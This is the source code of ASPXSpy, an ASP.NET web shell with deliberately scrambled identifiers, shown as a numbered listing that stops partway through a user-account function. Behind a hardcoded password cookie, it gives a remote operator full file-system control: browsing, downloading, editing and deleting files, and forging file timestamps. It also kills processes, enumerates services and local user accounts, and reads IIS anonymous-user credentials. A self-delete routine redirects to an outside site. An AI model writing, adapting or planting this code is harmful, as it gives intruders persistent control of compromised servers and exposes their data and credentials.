magelang9etar

1. <Marquee><h1>Exilie Team</h1></marquee>
2. <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
3. <%@ import Namespace="System.IO"%>
4. <%@ import Namespace="System.Diagnostics"%>
5. <%@ import Namespace="System.Data"%>
6. <%@ import Namespace="System.Management"%>
7. <%@ import Namespace="System.Data.OleDb"%>
8. <%@ import Namespace="Microsoft.Win32"%>
9. <%@ import Namespace="System.Net.Sockets" %>
10. <%@ import Namespace="System.Net" %>
11. <%@ import Namespace="System.Runtime.InteropServices"%>
12. <%@ import Namespace="System.DirectoryServices"%>
13. <%@ import Namespace="System.ServiceProcess"%>
14. <%@ import Namespace="System.Text.RegularExpressions"%>
15. <%@ Import Namespace="System.Threading"%>
16. <%@ Import Namespace="System.Data.SqlClient"%>
17. <%@ import Namespace="Microsoft.VisualBasic"%>
18. <%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
19. <%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
20. <%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
21. <%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
22. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
23. <script runat="server">
24. public string Password="233c752bf9ebc2ec932c5974aa8dc8e4";
25. public string vbhLn="ASPXSpy";
26. public int TdgGU=3-2;
27. protected OleDbConnection Dtdr=new OleDbConnection();
28. protected OleDbCommand Kkvb=new OleDbCommand();
29. public NetworkStream NS=null;
30. public NetworkStream NS1=null;
31. TcpClient tcp=new TcpClient();
32. TcpClient zvxm=new TcpClient();
33. ArrayList IVc=new ArrayList();
34. protected void Page_load(object sender,EventArgs e)
35. {
36. YFcNP(this);
37. fhAEn();
38. if (!pdo())
39. {
40. return;
41. }
42. if(IsPostBack)
43. {
44. string tkI=Request["__EVENTTARGET"];
45. string VqV=Request["__File"];
46. if(tkI!="")
47. {
48. switch(tkI)
49. {
50. case "Bin_Parent":
51. krIR(Ebgw(VqV));
52. break;
53. case "Bin_Listdir":
54. krIR(Ebgw(VqV));
55. break;
56. case "kRXgt":
57. kRXgt(Ebgw(VqV));
58. break;
59. case "Bin_Createfile":
60. gLKc(VqV);
61. break;
62. case "Bin_Editfile":
63. gLKc(VqV);
64. break;
65. case "Bin_Createdir":
66. stNPw(VqV);
67. break;
68. case "cYAl":
69. cYAl(VqV);
70. break;
71. case "ksGR":
72. ksGR(Ebgw(VqV));
73. break;
74. case "SJv":
75. SJv(VqV);
76. break;
77. case "Bin_Regread":
78. tpRQ(Ebgw(VqV));
79. break;
80. case "hae":
81. hae();
82. break;
83. case "urJG":
84. urJG(VqV);
85. break;
86. }
87. if(tkI.StartsWith("dAJTD"))
88. {
89. dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
90. }
91. else if(tkI.StartsWith("Tlvz"))
92. {
93. Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
94. }
95. else if(tkI.StartsWith("Bin_CFile"))
96. {
97. YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
98. }
99. }
100. }
101. else
102. {
103. PBZw();
104. }
105. }
106. public bool pdo()
107. {
108. if(Request.Cookies[vbhLn]==null)
109. {
110. tZSx();
111. return false;
112. }
113. else
114. {
115. if (Request.Cookies[vbhLn].Value != Password)
116. {
117. tZSx();
118. return false;
119. }
120. else
121. {
122. return true;
123. }
124. }
125. }
126. public void tZSx()
127. {
128. ljtzC.Visible=true;
129. ZVS.Visible=false;
130. }
131. protected void YKpI(object sender,EventArgs e)
132. {
133. Session.Abandon();
134. Response.Cookies.Add(new HttpCookie(vbhLn,null));
135. tZSx();
136. }
137. public void PBZw()
138. {
139. ZVS.Visible=true;
140. ljtzC.Visible=false;
141. Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
142. Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
143. Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
144. miansha2.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
145. Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
146. if (AXSbb.Value==string.Empty)
147. {
148. AXSbb.Value=OElM(Server.MapPath("."));
149. }
150. Bin_H2_Title.InnerText="File Manager >>";
151. krIR(AXSbb.Value);
152. }
153. public void fhAEn()
154. {
155. try
156. {
157. string[] YRgt=Directory.GetLogicalDrives();
158. for(int i=0;i<YRgt.Length;i++)
159. {
160. Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
161. Bin_Span_Drv.Controls.Add(c);
162. LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
163. nxeDR.Command+=new CommandEventHandler(this.iVk);
164. }
165. }catch(Exception ex){}
166. }
167. public string OElM(string path)
168. {
169. if(path.Substring(path.Length-1,1)!=@"\")
170. {
171. path=path+@"\";
172. }
173. return path;
174. }
175. public string nrrx(string path)
176. {
177. char[] trim={'\\'};
178. if(path.Substring(path.Length-1,1)==@"\")
179. {
180. path=path.TrimEnd(trim);
181. }
182. return path;
183. }
184. [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
185. public static extern int OMZP(string nDrive);
186. public string mFvj(string instr)
187. {
188. string EuXD=string.Empty;
189. int num=OMZP(instr);
190. switch(num)
191. {
192. case 1:
193. EuXD="Unknow("+instr+")";
194. break;
195. case 2:
196. EuXD="Removable("+instr+")";
197. break;
198. case 3:
199. EuXD="Fixed("+instr+")";
200. break;
201. case 4:
202. EuXD="Network("+instr+")";
203. break;
204. case 5:
205. EuXD="CDRom("+instr+")";
206. break;
207. case 6:
208. EuXD="RAM Disk("+instr+")";
209. break;
210. }
211. return EuXD.Replace(@"\","");
212. }
213. public string MVVJ(string instr)
214. {
215. byte[] tmp=Encoding.Default.GetBytes(instr);
216. return Convert.ToBase64String(tmp);
217. }
218. public string Ebgw(string instr)
219. {
220. byte[] tmp=Convert.FromBase64String(instr);
221. return Encoding.Default.GetString(tmp);
222. }
223. public void krIR(string path)
224. {
225. WICxe();
226. CzfO.Visible=true;
227. Bin_H2_Title.InnerText="File Manager >>";
228. AXSbb.Value=OElM(path);
229. DirectoryInfo GQMM=new DirectoryInfo(path);
230. if(Directory.GetParent(nrrx(path))!=null)
231. {
232. string bg=OKM();
233. TableRow p=new TableRow();
234. for(int i=1;i<6;i++)
235. {
236. TableCell pc=new TableCell();
237. if(i==1)
238. {
239. pc.Width=Unit.Parse("2%");
240. pc.Text="0";
241. p.CssClass=bg;
242. }
243. if(i==2)
244. {
245. pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
246. }
247. p.Cells.Add(pc);
248. UGzP.Rows.Add(p);
249. }
250. }
251. try
252. {
253. int vLlH=0;
254. foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
255. {
256. string bg=OKM();
257. vLlH++;
258. TableRow tr=new TableRow();
259. TableCell tc=new TableCell();
260. tc.Width=Unit.Parse("2%");
261. tc.Text="0";
262. tr.Attributes["onmouseover"]="this.className='focus';";
263. tr.CssClass=bg;
264. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
265. tr.Cells.Add(tc);
266. TableCell HczyN=new TableCell();
267. HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
268. tr.Cells.Add(HczyN);
269. TableCell LYZK=new TableCell();
270. LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
271. tr.Cells.Add(LYZK);
272. UGzP.Rows.Add(tr);
273. TableCell ERUL=new TableCell();
274. ERUL.Text="--";
275. tr.Cells.Add(ERUL);
276. UGzP.Rows.Add(tr);
277. TableCell ZGKh=new TableCell();
278. ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
279. tr.Cells.Add(ZGKh);
280. UGzP.Rows.Add(tr);
281. }
282. TableRow cKVA=new TableRow();
283. cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
284. cKVA.Attributes["bgcolor"]="#dddddd";
285. TableCell JlmW=new TableCell();
286. JlmW.Attributes["colspan"]="6" ;
287. JlmW.Attributes["height"]="5";
288. cKVA.Cells.Add(JlmW);
289. UGzP.Rows.Add(cKVA);
290. int aYRwo=0;
291. foreach(FileInfo Bin_Files in GQMM.GetFiles())
292. {
293. aYRwo++;
294. string gb=OKM();
295. TableRow tr=new TableRow();
296. TableCell tc=new TableCell();
297. tc.Width=Unit.Parse("2%");
298. tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
299. tr.Attributes["onmouseover"]="this.className='focus';";
300. tr.CssClass=gb;
301. tr.Attributes["onmouseout"]="this.className='"+gb+"';";
302. tr.Cells.Add(tc);
303. TableCell filename=new TableCell();
304. if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
305. {
306. string url=Request.Url.ToString();
307. filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
308. }
309. else
310. {
311. filename.Text=Bin_Files.Name;
312. }
313. TableCell albt=new TableCell();
314. albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
315. TableCell YzK=new TableCell();
316. YzK.Text=mTG(Bin_Files.Length);
317. TableCell GLpi=new TableCell();
318. GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
319. tr.Cells.Add(filename);
320. tr.Cells.Add(albt);
321. tr.Cells.Add(YzK);
322. tr.Cells.Add(GLpi);
323. UGzP.Rows.Add(tr);
324. }
325. string lgb=OKM();
326. TableRow oWam=new TableRow();
327. oWam.CssClass=lgb;
328. for(int i=1;i<4;i++)
329. {
330. TableCell lGV=new TableCell();
331. if(i==1)
332. {
333. lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
334. }
335. if(i==2)
336. {
337. lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
338. }
339. if(i==3)
340. {
341. lGV.ColumnSpan=4;
342. lGV.Style.Add("text-align","right");
343. lGV.Text=vLlH+" directories/ "+aYRwo+" files";
344. }
345. oWam.Cells.Add(lGV);
346. }
347. UGzP.Rows.Add(oWam);
348. }
349. catch(Exception error)
350. {
351. xseuB(error.Message);
352. }
353. }
354. public string OKM()
355. {
356. TdgGU++;
357. if(TdgGU % 2==0)
358. {
359. return "alt1";
360. }
361. else
362. {
363. return "alt2";
364. }
365. }
366. public void kRXgt(string qcKu)
367. {
368. try
369. {
370. Directory.Delete(qcKu,true);
371. xseuB("Directory delete new success !");
372. }
373. catch(Exception error)
374. {
375. xseuB(error.Message);
376. }
377. krIR(Directory.GetParent(qcKu).ToString());
378. }
379. public void dAJTD(string sdir,string ddir)
380. {
381. try
382. {
383. Directory.Move(sdir,ddir);
384. xseuB("Directory Renamed Success !");
385. }
386. catch(Exception error)
387. {
388. xseuB(error.Message);
389. }
390. krIR(AXSbb.Value);
391. }
392. public void Tlvz(string sfile,string dfile)
393. {
394. try
395. {
396. File.Move(sfile,dfile);
397. xseuB("File Renamed Success !");
398. }
399. catch(Exception error)
400. {
401. xseuB(error.Message);
402. }
403. krIR(AXSbb.Value);
404. }
405. public void YByN(string spath,string dpath)
406. {
407. try
408. {
409. File.Copy(spath,dpath);
410. xseuB("File Copy Success !");
411. }
412. catch(Exception error)
413. {
414. xseuB(error.Message);
415. }
416. krIR(AXSbb.Value);
417. }
418. public void stNPw(string path)
419. {
420. try
421. {
422. Directory.CreateDirectory(AXSbb.Value+path);
423. xseuB("Directory created success !");
424. }
425. catch(Exception error)
426. {
427. xseuB(error.Message);
428. }
429. krIR(AXSbb.Value);
430. }
431. public void gLKc(string path)
432. {
433. if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
434. {
435. foreach(ListItem item in NdCX.Items)
436. {
437. if(item.Selected=true)
438. {
439. item.Selected=false;
440. }
441. }
442. }
443. Bin_H2_Title.InnerHtml="Create/ Edit File >>";
444. WICxe();
445. vrFA.Visible=true;
446. if(path.IndexOf(":")< 0)
447. {
448. Sqon.Value=AXSbb.Value+path;
449. }
450. else
451. {
452. Sqon.Value=path;
453. }
454. if(File.Exists(Sqon.Value))
455. {
456. StreamReader sr;
457. if(NdCX.SelectedItem.Text=="UTF-8")
458. {
459. sr=new StreamReader(Sqon.Value,Encoding.UTF8);
460. }
461. else
462. {
463. sr=new StreamReader(Sqon.Value,Encoding.Default);
464. }
465. Xgvv.InnerText=sr.ReadToEnd();
466. sr.Close();
467. }
468. else
469. {
470. Xgvv.InnerText=string.Empty;
471. }
472. }
473. public void ksGR(string path)
474. {
475. FileInfo fs=new FileInfo(path);
476. Response.Clear();
477. Page.Response.ClearHeaders();
478. Page.Response.Buffer=false;
479. this.EnableViewState=false;
480. Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
481. Response.AddHeader("Content-Length",fs.Length.ToString());
482. Page.Response.ContentType="application/unknown";
483. Response.WriteFile(fs.FullName);
484. Page.Response.Flush();
485. Page.Response.Close();
486. Response.End();
487. Page.Response.Clear();
488. }
489. public void SJv(string path)
490. {
491. try
492. {
493. string[] spdT=path.Split(',');
494. for(int i=0;i<spdT.Length-1;i++)
495. {
496. File.Delete(AXSbb.Value+Ebgw(spdT[i]));
497. }
498. xseuB("File Delete Success !");
499. }
500. catch(Exception error)
501. {
502. xseuB(error.Message);
503. }
504. krIR(AXSbb.Value);
505. }
506. public void hae()
507. {
508. try
509. {
510. File.Delete(Request.PhysicalPath);
511. Response.Redirect("http://www.rootkit.net.cn");
512. }
513. catch(Exception error)
514. {
515. xseuB(error.Message);
516. }
517. }
518. public void cYAl(string path)
519. {
520. Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
521. WICxe();
522. zRyG.Visible=true;
523. QiFB.Value=AXSbb.Value+path;
524. lICp.Value=AXSbb.Value;
525. pWVL.Value=AXSbb.Value+path;
526. string Att=File.GetAttributes(QiFB.Value).ToString();
527. if(Att.LastIndexOf("ReadOnly")!=-1)
528. {
529. ZhWSK.Checked=true;
530. }
531. if(Att.LastIndexOf("System")!=-1)
532. {
533. SsR.Checked=true;
534. }
535. if(Att.LastIndexOf("Hidden")!=-1)
536. {
537. ccB.Checked=true;
538. }
539. if(Att.LastIndexOf("Archive")!=-1)
540. {
541. fbyZ.Checked=true;
542. }
543. yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
544. uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
545. aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
546. }
547. public static String mTG(Int64 fileSize)
548. {
549. if(fileSize<0)
550. {
551. throw new ArgumentOutOfRangeException("fileSize");
552. }
553. else if(fileSize >= 1024 * 1024 * 1024)
554. {
555. return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
556. }
557. else if(fileSize >= 1024 * 1024)
558. {
559. return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
560. }
561. else if(fileSize >= 1024)
562. {
563. return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
564. }
565. else
566. {
567. return string.Format("{0} B",fileSize);
568. }
569. }
570. private bool SGde(string sSrc)
571. {
572. Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
573. if(reg.IsMatch(sSrc))
574. {
575. return true;
576. }
577. else
578. {
579. return false;
580. }
581. }
582. public void AdCx()
583. {
584. string qcKu=string.Empty;
585. string mWGEm="IIS://localhost/W3SVC";
586. GlI.Style.Add("word-break","break-all");
587. try
588. {
589. DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
590. int fmW=0;
591. foreach(DirectoryEntry child in HHzcY.Children)
592. {
593. if(SGde(child.Name.ToString()))
594. {
595. fmW++;
596. DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
597. DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
598. string bg=OKM();
599. TableRow TR=new TableRow();
600. TR.Attributes["onmouseover"]="this.className='focus';";
601. TR.CssClass=bg;
602. TR.Attributes["onmouseout"]="this.className='"+bg+"';";
603. TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
604. for(int i=1;i<6;i++)
605. {
606. try
607. {
608. TableCell tfit=new TableCell();
609. switch(i)
610. {case 1:
611. tfit.Text=fmW.ToString();
612. break;
613. case 2:
614. tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
615. break;
616. case 3:
617. tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
618. break;
619. case 4:
620. StringBuilder sb=new StringBuilder();
621. PropertyValueCollection pc=child.Properties["ServerBindings"];
622. for (int j=0; j < pc.Count; j++)
623. {
624. sb.Append(pc[j].ToString()+"<br>");
625. }
626. tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
627. break;
628. case 5:
629. tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
630. break;
631. }
632. TR.Cells.Add(tfit);
633. }
634. catch (Exception ex)
635. {
636. xseuB(ex.Message);
637. continue;
638. }
639. }
640. GlI.Controls.Add(TR);
641. }
642. }
643. }
644. catch(Exception ex)
645. {
646. xseuB(ex.Message);
647. }
648. }
649. public ManagementObjectCollection PhQTd(string query)
650. {
651. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
652. return QS.Get();
653. }
654. public DataTable cCf(string query)
655. {
656. DataTable dt=new DataTable();
657. int i=0;
658. ManagementObjectSearcher QS=new ManagementObjectSearcher(new SelectQuery(query));
659. try
660. {
661. foreach(ManagementObject m in QS.Get())
662. {
663. DataRow dr=dt.NewRow();
664. PropertyDataCollection.PropertyDataEnumerator oEnum;
665. oEnum=(m.Properties.GetEnumerator()as PropertyDataCollection.PropertyDataEnumerator);
666. while(oEnum.MoveNext())
667. {
668. PropertyData DRU=(PropertyData)oEnum.Current;
669. if(dt.Columns.IndexOf(DRU.Name)==-1)
670. {
671. dt.Columns.Add(DRU.Name);
672. dt.Columns[dt.Columns.Count-1].DefaultValue="";
673. }
674. if(m[DRU.Name]!=null)
675. {
676. dr[DRU.Name]=m[DRU.Name].ToString();
677. }
678. else
679. {
680. dr[DRU.Name]=string.Empty;
681. }
682. }
683. dt.Rows.Add(dr);
684. }
685. }
686. catch(Exception error)
687. {
688. }
689. return dt;
690. }
691. public void YUw()
692. {
693. try
694. {
695. Bin_H2_Title.InnerText="Process >>";
696. WICxe();
697. DCbS.Visible=true;
698. int UEbTI=0;
699. Process[] p=Process.GetProcesses();
700. foreach(Process sp in p)
701. {
702. UEbTI++;
703. string bg=OKM();
704. TableRow tr=new TableRow();
705. tr.Attributes["onmouseover"]="this.className='focus';";
706. tr.CssClass=bg;
707. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
708. for(int i=1;i<7;i++)
709. {
710. TableCell td=new TableCell();
711. if(i==1)
712. {
713. td.Width=Unit.Parse("2%");
714. td.Text=UEbTI.ToString();
715. tr.Controls.Add(td);
716. }
717. if(i==2)
718. {
719. td.Text=sp.Id.ToString();
720. tr.Controls.Add(td);
721. }
722. if(i==3)
723. {
724. td.Text=sp.ProcessName.ToString();
725. tr.Controls.Add(td);
726. }
727. if(i==4)
728. {
729. td.Text=sp.Threads.Count.ToString();
730. tr.Controls.Add(td);
731. }
732. if(i==5)
733. {
734. td.Text=sp.BasePriority.ToString();
735. tr.Controls.Add(td);
736. }
737. if(i==6)
738. {
739. td.Text="--";
740. tr.Controls.Add(td);
741. }
742. }
743. IjsL.Controls.Add(tr);
744. }
745. }
746. catch(Exception error)
747. {
748. AIz();
749. }
750. AIz();
751. }
752. public void AIz()
753. {
754. try
755. {
756. Bin_H2_Title.InnerText="Process >>";
757. WICxe();
758. DCbS.Visible=true;
759. int UEbTI=0;
760. DataTable dt=cCf("Win32_Process");
761. for(int j=0;j<dt.Rows.Count;j++)
762. {
763. UEbTI++;
764. string bg=OKM();
765. TableRow tr=new TableRow();
766. tr.Attributes["onmouseover"]="this.className='focus';";
767. tr.CssClass=bg;
768. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
769. for(int i=1;i<7;i++)
770. {
771. TableCell td=new TableCell();
772. if(i==1)
773. {
774. td.Width=Unit.Parse("2%");
775. td.Text=UEbTI.ToString();
776. tr.Controls.Add(td);
777. }
778. if(i==2)
779. {
780. td.Text=dt.Rows[j]["ProcessID"].ToString();
781. tr.Controls.Add(td);
782. }
783. if(i==3)
784. {
785. td.Text=dt.Rows[j]["Name"].ToString();
786. tr.Controls.Add(td);
787. }
788. if(i==4)
789. {
790. td.Text=dt.Rows[j]["ThreadCount"].ToString();
791. tr.Controls.Add(td);
792. }
793. if(i==5)
794. {
795. td.Text=dt.Rows[j]["Priority"].ToString();
796. tr.Controls.Add(td);
797. }
798. if(i==6)
799. {
800. if( dt.Rows[j]["CommandLine"]!=string.Empty)
801. {
802. td.Text="<a href=\"javascript:Bin_PostBack('urJG','"+dt.Rows[j]["ProcessID"].ToString()+"')\">Kill</a>";
803. }
804. else
805. {
806. td.Text="--";
807. }
808. tr.Controls.Add(td);
809. }
810. }
811. IjsL.Controls.Add(tr);
812. }
813. }
814. catch(Exception error)
815. {
816. xseuB(error.Message);
817. }
818. }
819. public void urJG(string pid)
820. {
821. try
822. {
823. foreach(ManagementObject p in PhQTd("Select * from Win32_Process Where ProcessID ='"+pid+"'"))
824. {
825. p.InvokeMethod("Terminate",null);
826. p.Dispose();
827. }
828. xseuB("Process Kill Success !");
829. }
830. catch(Exception error)
831. {
832. xseuB(error.Message);
833. }
834. AIz();
835. }
836. public void oHpF()
837. {
838. try
839. {
840. Bin_H2_Title.InnerText="Services >>";
841. WICxe();
842. iQxm.Visible=true;
843. int UEbTI=0;
844. ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
845. for(int i=0;i<kQmRu.Length;i++)
846. {
847. UEbTI++;
848. string bg=OKM();
849. TableRow tr=new TableRow();
850. tr.Attributes["onmouseover"]="this.className='focus';";
851. tr.CssClass=bg;
852. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
853. for(int b=1;b<7;b++)
854. {
855. TableCell td=new TableCell();
856. if(b==1)
857. {
858. td.Width=Unit.Parse("2%");
859. td.Text=UEbTI.ToString();
860. tr.Controls.Add(td);
861. }
862. if(b==2)
863. {
864. td.Text="null";
865. tr.Controls.Add(td);
866. }
867. if(b==3)
868. {
869. td.Text=kQmRu[i].ServiceName.ToString();
870. tr.Controls.Add(td);
871. }
872. if(b==4)
873. {
874. td.Text="";
875. tr.Controls.Add(td);
876. }
877. if(b==5)
878. {
879. string kOIo=kQmRu[i].Status.ToString();
880. if(kOIo=="Running")
881. {
882. td.Text="<font color=green>"+kOIo+"</font>";
883. }
884. else
885. {
886. td.Text="<font color=red>"+kOIo+"</font>";
887. }
888. tr.Controls.Add(td);
889. }
890. if(b==6)
891. {
892. td.Text="";
893. tr.Controls.Add(td);
894. }
895. }
896. vHCs.Controls.Add(tr);
897. }
898. }
899. catch(Exception error)
900. {
901. xseuB(error.Message);
902. }
903. }
904. public void tZRH()
905. {
906. try
907. {
908. Bin_H2_Title.InnerText="Services >>";
909. WICxe();
910. iQxm.Visible=true;
911. int UEbTI=0;
912. DataTable dt=cCf("Win32_Service");
913. for(int j=0;j<dt.Rows.Count;j++)
914. {
915. UEbTI++;
916. string bg=OKM();
917. TableRow tr=new TableRow();
918. tr.Attributes["onmouseover"]="this.className='focus';";
919. tr.CssClass=bg;
920. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
921. tr.Attributes["title"]=dt.Rows[j]["Description"].ToString();
922. for(int i=1;i<7;i++)
923. {
924. TableCell td=new TableCell();
925. if(i==1)
926. {
927. td.Width=Unit.Parse("2%");
928. td.Text=UEbTI.ToString();
929. tr.Controls.Add(td);
930. }
931. if(i==2)
932. {
933. td.Text=dt.Rows[j]["ProcessID"].ToString();
934. tr.Controls.Add(td);
935. }
936. if(i==3)
937. {
938. td.Text=dt.Rows[j]["Name"].ToString();
939. tr.Controls.Add(td);
940. }
941. if(i==4)
942. {
943. td.Text=dt.Rows[j]["PathName"].ToString();
944. tr.Controls.Add(td);
945. }
946. if(i==5)
947. {
948. string kOIo=dt.Rows[j]["State"].ToString();
949. if(kOIo=="Running")
950. {
951. td.Text="<font color=green>"+kOIo+"</font>";
952. }
953. else
954. {
955. td.Text="<font color=red>"+kOIo+"</font>";
956. }
957. tr.Controls.Add(td);
958. }
959. if(i==6)
960. {
961. td.Text=dt.Rows[j]["StartMode"].ToString();
962. tr.Controls.Add(td);
963. }
964. }
965. vHCs.Controls.Add(tr);
966. }
967. }
968. catch(Exception error)
969. {
970. oHpF();
971. }
972. }
973. public void PLd()
974. {
975. try
976. {
977. WICxe();
978. xWVQ.Visible=true;
979. Bin_H2_Title.InnerText="User Information >>";
980. DirectoryEntry TWQ=new DirectoryEntry("WinNT://"+Environment.MachineName.ToString());
981. foreach(DirectoryEntry child in TWQ.Children)
982. {
983. foreach(string name in child.Properties.PropertyNames)
984. {
985. PropertyValueCollection pvc=child.Properties[name];
986. int c=pvc.Count;
987. for(int i=0;i<c;i++)
988. {
989. if(name!="objectSid" && name!="Parameters" && name!="LoginHours")
990. {
991. string bg=OKM();
992. TableRow tr=new TableRow();
993. tr.Attributes["onmouseover"]="this.className='focus';";
994. tr.CssClass=bg;
995. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
996. TableCell td=new TableCell();
997. td.Text=name;
998. tr.Controls.Add(td);
999. TableCell td1=new TableCell();
1000. td1.Text=pvc[i].ToString();
1001. tr.Controls.Add(td1);
1002. VPa.Controls.Add(tr);
1003. }
1004. }
1005. }
1006. TableRow trn=new TableRow();
1007. for(int x=1;x<3;x++)
1008. {
1009. TableCell tdn=new TableCell();
1010. tdn.Attributes["style"]="height:2px;background-color:#bbbbbb;";
1011. trn.Controls.Add(tdn);
1012. VPa.Controls.Add(trn);
1013. }
1014. }
1015. }
1016. catch(Exception error)
1017. {
1018. xseuB(error.Message);
1019. }
1020. }
1021. public void iLVUT()
1022. {
1023. try
1024. {
1025. WICxe();
1026. xWVQ.Visible=true;
1027. Bin_H2_Title.InnerText="User Information >>";
1028. DataTable user=cCf("Win32_UserAccount");
1029. for(int i=0;i<user.Rows.Count;i++)
1030. {
1031. for(int j=0;j<user.Columns.Count;j++)
1032. {
1033. string bg=OKM();
1034. TableRow tr=new TableRow();
1035. tr.Attributes["onmouseover"]="this.className='focus';";
1036. tr.CssClass=bg;
1037. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
1038. TableCell td=new TableCell();
1039. td.Text=user.Columns[j].ToString();
1040. tr.Controls.Add(td);
